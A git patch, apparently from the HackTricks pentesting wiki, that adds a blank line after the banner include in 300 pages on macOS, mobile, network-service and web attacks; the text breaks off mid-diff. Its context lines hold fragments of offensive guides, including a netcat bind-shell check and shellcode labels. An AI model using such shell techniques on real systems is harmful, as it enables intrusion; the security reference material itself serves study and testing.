From ad3f52d7256c0d282cff444896142b51e8185ed4 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Fri, 3 Jan 2025 01:07:38 +0100 Subject: [PATCH] t2 --- .../mac-os-architecture/README.md | 1 + .../macos-ipc-inter-process-communication/README.md | 1 + .../mac-os-architecture/macos-kernel-extensions.md | 1 + .../mac-os-architecture/macos-kernel-vulnerabilities.md | 1 + .../mac-os-architecture/macos-system-extensions.md | 1 + .../macos-apps-inspecting-debugging-and-fuzzing/README.md | 1 + .../arm64-basic-assembly.md | 1 + .../introduction-to-x64.md | 1 + .../objects-in-memory.md | 1 + .../macos-files-folders-and-binaries/README.md | 1 + .../macos-files-folders-and-binaries/macos-bundles.md | 1 + .../macos-files-folders-and-binaries/macos-installers-abuse.md | 1 + .../macos-files-folders-and-binaries/macos-memory-dumping.md | 1 + .../macos-sensitive-locations.md | 1 + .../universal-binaries-and-mach-o-format.md | 1 + .../macos-proces-abuse/README.md | 1 + .../macos-proces-abuse/macos-.net-applications-injection.md | 1 + .../macos-proces-abuse/macos-chromium-injection.md | 1 + .../macos-proces-abuse/macos-dirty-nib.md | 1 + .../macos-proces-abuse/macos-electron-applications-injection.md | 1 + .../macos-proces-abuse/macos-function-hooking.md | 1 + .../macos-ipc-inter-process-communication/README.md | 1 + .../macos-mig-mach-interface-generator.md | 1 + .../macos-thread-injection-via-task-port.md | 1 + .../macos-ipc-inter-process-communication/macos-xpc/README.md | 1 + .../macos-xpc/macos-xpc-authorization.md | 1 + .../macos-xpc/macos-xpc-connecting-process-check/README.md | 1 + .../macos-xpc-connecting-process-check/macos-pid-reuse.md | 1 + .../macos-xpc_connection_get_audit_token-attack.md | 1 + .../macos-proces-abuse/macos-java-apps-injection.md | 1 + .../macos-proces-abuse/macos-library-injection/README.md | 1 + .../macos-dyld-hijacking-and-dyld_insert_libraries.md | 1 + .../macos-library-injection/macos-dyld-process.md | 1 + .../macos-proces-abuse/macos-perl-applications-injection.md | 1 + .../macos-proces-abuse/macos-python-applications-injection.md | 1 + .../macos-proces-abuse/macos-ruby-applications-injection.md | 1 + .../macos-security-protections/README.md | 1 + .../macos-amfi-applemobilefileintegrity.md | 1 + .../macos-authorizations-db-and-authd.md | 1 + .../macos-security-protections/macos-code-signing.md | 1 + .../macos-security-protections/macos-dangerous-entitlements.md | 1 + .../macos-security-protections/macos-fs-tricks/README.md | 1 + .../macos-fs-tricks/macos-xattr-acls-extra-stuff.md | 1 + .../macos-security-protections/macos-gatekeeper.md | 1 + .../macos-launch-environment-constraints.md | 1 + .../macos-macf-mandatory-access-control-framework.md | 1 + .../macos-security-protections/macos-sandbox/README.md | 1 + .../macos-sandbox/macos-default-sandbox-debug.md | 1 + .../macos-sandbox/macos-sandbox-debug-and-bypass/README.md | 1 + .../macos-office-sandbox-bypasses.md | 1 + .../macos-security-protections/macos-sip.md | 1 + .../macos-security-protections/macos-tcc/README.md | 1 + .../macos-security-protections/macos-tcc/macos-apple-events.md | 1 + .../macos-tcc/macos-tcc-bypasses/README.md | 1 + .../macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md | 1 + .../macos-security-protections/macos-tcc/macos-tcc-payloads.md | 1 + src/misc/references.md | 1 + src/mobile-pentesting/android-app-pentesting/README.md | 1 + src/mobile-pentesting/android-app-pentesting/adb-commands.md | 1 + .../android-app-pentesting/android-applications-basics.md | 1 + .../android-app-pentesting/android-task-hijacking.md | 1 + src/mobile-pentesting/android-app-pentesting/apk-decompilers.md | 1 + .../android-app-pentesting/avd-android-virtual-device.md | 1 + .../bypass-biometric-authentication-android.md | 1 + .../android-app-pentesting/content-protocol.md | 1 + .../android-app-pentesting/drozer-tutorial/README.md | 1 + .../drozer-tutorial/exploiting-content-providers.md | 1 + .../exploiting-a-debuggeable-applciation.md | 1 + .../android-app-pentesting/frida-tutorial/README.md | 1 + .../android-app-pentesting/frida-tutorial/frida-tutorial-1.md | 1 + .../android-app-pentesting/frida-tutorial/frida-tutorial-2.md | 1 + .../android-app-pentesting/frida-tutorial/objection-tutorial.md | 1 + .../android-app-pentesting/frida-tutorial/owaspuncrackable-1.md | 1 + .../google-ctf-2018-shall-we-play-a-game.md | 1 + .../android-app-pentesting/install-burp-certificate.md | 1 + .../android-app-pentesting/intent-injection.md | 1 + .../android-app-pentesting/make-apk-accept-ca-certificate.md | 1 + .../android-app-pentesting/manual-deobfuscation.md | 1 + .../android-app-pentesting/react-native-application.md | 1 + .../android-app-pentesting/reversing-native-libraries.md | 1 + src/mobile-pentesting/android-app-pentesting/smali-changes.md | 1 + .../spoofing-your-location-in-play-store.md | 1 + src/mobile-pentesting/android-app-pentesting/tapjacking.md | 1 + src/mobile-pentesting/android-app-pentesting/webview-attacks.md | 1 + src/mobile-pentesting/android-checklist.md | 1 + src/mobile-pentesting/cordova-apps.md | 1 + src/mobile-pentesting/ios-pentesting-checklist.md | 1 + src/mobile-pentesting/ios-pentesting/README.md | 1 + .../ios-pentesting/basic-ios-testing-operations.md | 1 + .../ios-pentesting/burp-configuration-for-ios.md | 1 + .../extracting-entitlements-from-compiled-application.md | 1 + .../ios-pentesting/frida-configuration-in-ios.md | 1 + src/mobile-pentesting/ios-pentesting/ios-app-extensions.md | 1 + src/mobile-pentesting/ios-pentesting/ios-basics.md | 1 + .../ios-custom-uri-handlers-deeplinks-custom-schemes.md | 1 + .../ios-pentesting/ios-hooking-with-objection.md | 1 + src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md | 1 + .../ios-pentesting/ios-serialisation-and-encoding.md | 1 + src/mobile-pentesting/ios-pentesting/ios-testing-environment.md | 1 + src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md | 1 + src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md | 1 + src/mobile-pentesting/ios-pentesting/ios-universal-links.md | 1 + src/mobile-pentesting/ios-pentesting/ios-webviews.md | 1 + src/mobile-pentesting/xamarin-apps.md | 1 + .../10000-network-data-management-protocol-ndmp.md | 1 + src/network-services-pentesting/1026-pentesting-rusersd.md | 1 + src/network-services-pentesting/1080-pentesting-socks.md | 1 + src/network-services-pentesting/1099-pentesting-java-rmi.md | 1 + src/network-services-pentesting/11211-memcache/README.md | 1 + .../11211-memcache/memcache-commands.md | 1 + src/network-services-pentesting/113-pentesting-ident.md | 1 + src/network-services-pentesting/135-pentesting-msrpc.md | 1 + .../137-138-139-pentesting-netbios.md | 1 + src/network-services-pentesting/1414-pentesting-ibmmq.md | 1 + .../1521-1522-1529-pentesting-oracle-listener.md | 1 + .../1521-1522-1529-pentesting-oracle-listener/README.md | 1 + .../15672-pentesting-rabbitmq-management.md | 1 + src/network-services-pentesting/1723-pentesting-pptp.md | 1 + .../1883-pentesting-mqtt-mosquitto.md | 1 + src/network-services-pentesting/2375-pentesting-docker.md | 1 + .../24007-24008-24009-49152-pentesting-glusterfs.md | 1 + src/network-services-pentesting/27017-27018-mongodb.md | 1 + src/network-services-pentesting/3128-pentesting-squid.md | 1 + src/network-services-pentesting/3260-pentesting-iscsi.md | 1 + src/network-services-pentesting/3299-pentesting-saprouter.md | 1 + src/network-services-pentesting/3632-pentesting-distcc.md | 1 + .../3690-pentesting-subversion-svn-server.md | 1 + .../3702-udp-pentesting-ws-discovery.md | 1 + src/network-services-pentesting/43-pentesting-whois.md | 1 + .../4369-pentesting-erlang-port-mapper-daemon-epmd.md | 1 + src/network-services-pentesting/44134-pentesting-tiller-helm.md | 1 + src/network-services-pentesting/44818-ethernetip.md | 1 + src/network-services-pentesting/47808-udp-bacnet.md | 1 + src/network-services-pentesting/4786-cisco-smart-install.md | 1 + src/network-services-pentesting/4840-pentesting-opc-ua.md | 1 + src/network-services-pentesting/49-pentesting-tacacs+.md | 1 + .../5000-pentesting-docker-registry.md | 1 + .../50030-50060-50070-50075-50090-pentesting-hadoop.md | 1 + src/network-services-pentesting/512-pentesting-rexec.md | 1 + .../515-pentesting-line-printer-daemon-lpd.md | 1 + src/network-services-pentesting/5353-udp-multicast-dns-mdns.md | 1 + src/network-services-pentesting/5439-pentesting-redshift.md | 1 + src/network-services-pentesting/554-8554-pentesting-rtsp.md | 1 + src/network-services-pentesting/5555-android-debug-bridge.md | 1 + src/network-services-pentesting/5601-pentesting-kibana.md | 1 + src/network-services-pentesting/5671-5672-pentesting-amqp.md | 1 + src/network-services-pentesting/584-pentesting-afp.md | 1 + src/network-services-pentesting/5984-pentesting-couchdb.md | 1 + src/network-services-pentesting/5985-5986-pentesting-omi.md | 1 + src/network-services-pentesting/5985-5986-pentesting-winrm.md | 1 + src/network-services-pentesting/6000-pentesting-x11.md | 1 + src/network-services-pentesting/623-udp-ipmi.md | 1 + src/network-services-pentesting/6379-pentesting-redis.md | 1 + src/network-services-pentesting/69-udp-tftp.md | 1 + src/network-services-pentesting/7-tcp-udp-pentesting-echo.md | 1 + src/network-services-pentesting/700-pentesting-epp.md | 1 + .../8009-pentesting-apache-jserv-protocol-ajp.md | 1 + src/network-services-pentesting/8086-pentesting-influxdb.md | 2 +- src/network-services-pentesting/8089-splunkd.md | 1 + .../8333-18333-38333-18444-pentesting-bitcoin.md | 1 + src/network-services-pentesting/873-pentesting-rsync.md | 1 + src/network-services-pentesting/9000-pentesting-fastcgi.md | 1 + src/network-services-pentesting/9001-pentesting-hsqldb.md | 1 + src/network-services-pentesting/9100-pjl.md | 1 + .../9200-pentesting-elasticsearch.md | 1 + src/network-services-pentesting/cassandra.md | 1 + src/network-services-pentesting/ipsec-ike-vpn-pentesting.md | 1 + src/network-services-pentesting/nfs-service-pentesting.md | 1 + .../pentesting-264-check-point-firewall-1.md | 1 + .../pentesting-631-internet-printing-protocol-ipp.md | 1 + .../pentesting-compaq-hp-insight-manager.md | 1 + src/network-services-pentesting/pentesting-dns.md | 1 + src/network-services-pentesting/pentesting-finger.md | 1 + src/network-services-pentesting/pentesting-ftp/README.md | 1 + .../pentesting-ftp/ftp-bounce-attack.md | 1 + .../pentesting-ftp/ftp-bounce-download-2oftp-file.md | 1 + src/network-services-pentesting/pentesting-imap.md | 1 + src/network-services-pentesting/pentesting-irc.md | 1 + .../pentesting-jdwp-java-debug-wire-protocol.md | 1 + .../pentesting-kerberos-88/README.md | 1 + .../pentesting-kerberos-88/harvesting-tickets-from-linux.md | 1 + .../pentesting-kerberos-88/harvesting-tickets-from-windows.md | 1 + src/network-services-pentesting/pentesting-ldap.md | 1 + src/network-services-pentesting/pentesting-modbus.md | 1 + .../pentesting-mssql-microsoft-sql-server/README.md | 1 + .../types-of-mssql-users.md | 1 + src/network-services-pentesting/pentesting-mysql.md | 1 + src/network-services-pentesting/pentesting-ntp.md | 1 + src/network-services-pentesting/pentesting-pop.md | 1 + src/network-services-pentesting/pentesting-postgresql.md | 1 + src/network-services-pentesting/pentesting-rdp.md | 1 + src/network-services-pentesting/pentesting-remote-gdbserver.md | 1 + src/network-services-pentesting/pentesting-rlogin.md | 1 + src/network-services-pentesting/pentesting-rpcbind.md | 1 + src/network-services-pentesting/pentesting-rsh.md | 1 + src/network-services-pentesting/pentesting-sap.md | 1 + src/network-services-pentesting/pentesting-smb.md | 1 + src/network-services-pentesting/pentesting-smb/README.md | 1 + .../pentesting-smb/rpcclient-enumeration.md | 1 + src/network-services-pentesting/pentesting-smtp/README.md | 1 + .../pentesting-smtp/smtp-commands.md | 1 + .../pentesting-smtp/smtp-smuggling.md | 1 + src/network-services-pentesting/pentesting-snmp/README.md | 1 + src/network-services-pentesting/pentesting-snmp/cisco-snmp.md | 1 + src/network-services-pentesting/pentesting-snmp/snmp-rce.md | 1 + src/network-services-pentesting/pentesting-ssh.md | 1 + src/network-services-pentesting/pentesting-telnet.md | 1 + src/network-services-pentesting/pentesting-vnc.md | 1 + src/network-services-pentesting/pentesting-voip/README.md | 1 + .../pentesting-voip/basic-voip-protocols/README.md | 1 + .../basic-voip-protocols/sip-session-initiation-protocol.md | 1 + .../pentesting-web/403-and-401-bypasses.md | 1 + src/network-services-pentesting/pentesting-web/README.md | 1 + .../pentesting-web/aem-adobe-experience-cloud.md | 1 + src/network-services-pentesting/pentesting-web/angular.md | 1 + src/network-services-pentesting/pentesting-web/apache.md | 1 + .../pentesting-web/artifactory-hacking-guide.md | 1 + src/network-services-pentesting/pentesting-web/bolt-cms.md | 1 + .../pentesting-web/buckets/README.md | 1 + .../pentesting-web/buckets/firebase-database.md | 1 + src/network-services-pentesting/pentesting-web/cgi.md | 1 + .../pentesting-web/code-review-tools.md | 1 + src/network-services-pentesting/pentesting-web/django.md | 1 + .../pentesting-web/dotnetnuke-dnn.md | 1 + src/network-services-pentesting/pentesting-web/drupal/README.md | 1 + .../pentesting-web/drupal/drupal-rce.md | 1 + .../pentesting-web/electron-desktop-apps/README.md | 1 + .../electron-contextisolation-rce-via-electron-internal-code.md | 1 + .../electron-contextisolation-rce-via-ipc.md | 1 + .../electron-contextisolation-rce-via-preload-code.md | 1 + src/network-services-pentesting/pentesting-web/flask.md | 1 + src/network-services-pentesting/pentesting-web/git.md | 1 + src/network-services-pentesting/pentesting-web/golang.md | 1 + src/network-services-pentesting/pentesting-web/grafana.md | 1 + src/network-services-pentesting/pentesting-web/graphql.md | 1 + .../pentesting-web/gwt-google-web-toolkit.md | 1 + .../pentesting-web/h2-java-sql-database.md | 1 + .../pentesting-web/iis-internet-information-services.md | 1 + .../pentesting-web/imagemagick-security.md | 1 + src/network-services-pentesting/pentesting-web/jboss.md | 1 + src/network-services-pentesting/pentesting-web/jira.md | 1 + src/network-services-pentesting/pentesting-web/joomla.md | 1 + src/network-services-pentesting/pentesting-web/jsp.md | 1 + src/network-services-pentesting/pentesting-web/laravel.md | 1 + src/network-services-pentesting/pentesting-web/moodle.md | 1 + src/network-services-pentesting/pentesting-web/nextjs-1.md | 1 + src/network-services-pentesting/pentesting-web/nextjs.md | 1 + src/network-services-pentesting/pentesting-web/nginx.md | 1 + .../pentesting-web/nodejs-express.md | 1 + .../pentesting-web/php-tricks-esp/README.md | 1 + .../php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md | 1 + .../pentesting-web/php-tricks-esp/php-ssrf.md | 1 + .../README.md | 1 + .../disable_functions-bypass-dl-function.md | 1 + ...pass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md | 1 + .../disable_functions-bypass-mod_cgi.md | 1 + ...unctions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md | 1 + .../disable_functions-bypass-php-5.2-fopen-exploit.md | 1 + ...unctions-bypass-php-5.2.3-win32std-ext-protections-bypass.md | 1 + .../disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md | 1 + .../disable_functions-bypass-php-7.0-7.4-nix-only.md | 1 + .../disable_functions-bypass-php-fpm-fastcgi.md | 1 + .../disable_functions-bypass-php-less-than-5.2.9-on-windows.md | 1 + ...ctions-bypass-php-perl-extension-safe_mode-bypass-exploit.md | 1 + ..._mode-bypass-via-proc_open-and-custom-environment-exploit.md | 1 + .../disable_functions-bypass-via-mem.md | 1 + .../disable_functions-php-5.2.4-ioncube-extension-exploit.md | 1 + .../disable_functions-php-5.x-shellshock-exploit.md | 1 + src/network-services-pentesting/pentesting-web/prestashop.md | 1 + .../pentesting-web/put-method-webdav.md | 1 + src/network-services-pentesting/pentesting-web/python.md | 1 + src/network-services-pentesting/pentesting-web/rocket-chat.md | 1 + .../pentesting-web/special-http-headers.md | 1 + .../pentesting-web/spring-actuators.md | 1 + src/network-services-pentesting/pentesting-web/symphony.md | 1 + src/network-services-pentesting/pentesting-web/tomcat/README.md | 1 + .../pentesting-web/uncovering-cloudflare.md | 1 + .../pentesting-web/vmware-esx-vcenter....md | 1 + .../pentesting-web/web-api-pentesting.md | 1 + src/network-services-pentesting/pentesting-web/werkzeug.md | 1 + src/network-services-pentesting/pentesting-web/wordpress.md | 1 + src/pentesting-web/2fa-bypass.md | 1 + src/pentesting-web/abusing-hop-by-hop-headers.md | 1 + src/pentesting-web/account-takeover.md | 1 + src/pentesting-web/bypass-payment-process.md | 1 + src/pentesting-web/captcha-bypass.md | 1 + src/pentesting-web/clickjacking.md | 1 + src/pentesting-web/client-side-path-traversal.md | 1 + src/pentesting-web/client-side-template-injection-csti.md | 1 + src/pentesting-web/command-injection.md | 1 + src/pentesting-web/cors-bypass.md | 1 + src/pentesting-web/crlf-0d-0a.md | 1 + src/pentesting-web/csrf-cross-site-request-forgery.md | 1 + src/pentesting-web/dependency-confusion.md | 1 + src/pentesting-web/domain-subdomain-takeover.md | 1 + src/pentesting-web/email-injections.md | 1 + .../formula-csv-doc-latex-ghostscript-injection.md | 1 + src/pentesting-web/grpc-web-pentest.md | 1 + src/pentesting-web/h2c-smuggling.md | 1 + src/pentesting-web/http-connection-contamination.md | 1 + 300 files changed, 300 insertions(+), 1 deletion(-) diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md index 5b8b45324..4280561a8 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md @@ -71,3 +71,4 @@ macos-system-extensions.md {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md index a90363d6b..f5f7102ce 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md @@ -851,3 +851,4 @@ For more info check: {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md index 627f62657..e0a163bda 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md @@ -150,3 +150,4 @@ nm -a binaries/com.apple.security.sandbox | wc -l {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md index a41b2c95e..b297299b0 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md @@ -10,3 +10,4 @@ {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md index 6a9ebaa76..06f89953f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md @@ -83,3 +83,4 @@ At the end this was fixed by giving the new permission **`kTCCServiceEndpointSec {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md index edfa75be9..b0aae39d5 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md @@ -635,3 +635,4 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md index 8ac0195ef..be78c22be 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md @@ -797,3 +797,4 @@ call_execve: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md index ca201bd6d..7d1dbe1d2 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md @@ -444,3 +444,4 @@ dup2: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md index a822ef393..3c61226b3 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md @@ -153,3 +153,4 @@ During runtime and additional structure `class_rw_t` is used containing pointers {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md index 92475ce28..27cb6f957 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md @@ -270,3 +270,4 @@ The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/ {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md index c9a581ed8..7c50b0ed1 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md @@ -44,3 +44,4 @@ For more detailed information on `Info.plist` keys and their meanings, the Apple {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md index bb1fb251f..0e4043961 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md @@ -166,3 +166,4 @@ productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pk {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md index 0f2b56672..6c4d85d7d 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md @@ -55,3 +55,4 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem- {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md index 53f9819c1..555d6012f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md @@ -275,3 +275,4 @@ These are notifications that the user should see in the screen: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md index a8c97c15a..bbbffc1e9 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md @@ -414,3 +414,4 @@ In `__DATA` segment (rw-): {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md index 172e77dba..4884e4bda 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md @@ -277,3 +277,4 @@ Note that to call that function you need to be **the same uid** as the one runni {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md index 5c949ac6b..69171ae13 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md @@ -120,3 +120,4 @@ The full POC code for injection into PowerShell is accessible [here](https://gis {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md index 3bda31856..0e64c06c3 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md @@ -35,3 +35,4 @@ Find more examples in the tools links {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md index e7d9935fa..1d56599c9 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md @@ -73,3 +73,4 @@ From macOS Sonoma onwards, modifications inside App bundles are restricted. Howe {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md index e83d9cc23..f5c053b02 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md @@ -270,3 +270,4 @@ Shell binding requested. Check `nc 127.0.0.1 12345` {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md index f9639226f..deb4db41a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md @@ -378,3 +378,4 @@ static void customConstructor(int argc, const char **argv) { {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md index 2fe179328..c78575597 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md @@ -1287,3 +1287,4 @@ macos-mig-mach-interface-generator.md {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md index 98ce94863..f0665e6d1 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md +++ 